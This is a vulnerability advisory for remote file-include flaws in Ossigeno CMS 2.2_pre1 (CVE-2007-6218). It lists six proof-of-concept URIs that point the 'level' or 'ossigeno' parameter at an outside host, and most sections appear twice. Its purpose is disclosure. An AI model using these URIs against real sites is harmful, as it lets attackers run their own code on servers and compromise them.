Ossigeno CMS Multiple Remote File Include Vulnerabilities
BID:26654
Info
Ossigeno CMS Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 26654 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6218 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 30 2007 12:00AM |
| Updated: | Dec 07 2007 02:12PM |
| Credit: | ShAy6oOoN discovered these vulnerabilities. |
| Vulnerable: |
Ossigeno CMS Ossigeno CMS 2.2_pre1 |
| Not Vulnerable: | |
Discussion
Ossigeno CMS Multiple Remote File Include Vulnerabilities
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
Ossigeno CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect Ossigeno CMS 2.2_pre1; other versions may also be vulnerable.
Exploit / POC
Ossigeno CMS Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/upload/xax/admin/modules/install_module.php?level=http://www.example2.com
http://www.example.com/upload/xax/admin/modules/uninstall_module.php?level=http://www.example2.com
http://www.example.com/upload/xax/admin/patch/index.php?level=http://www.example2.com
http://www.example.com/upload/xax/ossigeno/admin/install_module.php?level=http://www.example2.com
http://www.example.com/upload/xax/ossigeno/admin/uninstall_module.php?level=http://www.example2.com
http://www.example.com/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://www.example2.com
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/upload/xax/admin/modules/install_module.php?level=http://www.example2.com
http://www.example.com/upload/xax/admin/modules/uninstall_module.php?level=http://www.example2.com
http://www.example.com/upload/xax/admin/patch/index.php?level=http://www.example2.com
http://www.example.com/upload/xax/ossigeno/admin/install_module.php?level=http://www.example2.com
http://www.example.com/upload/xax/ossigeno/admin/uninstall_module.php?level=http://www.example2.com
http://www.example.com/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=http://www.example2.com
Solution / Fix
Ossigeno CMS Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Ossigeno CMS Multiple Remote File Include Vulnerabilities
References:
References:
- Ossigeno CMS Sourceforge Page (Ossigeno CMS)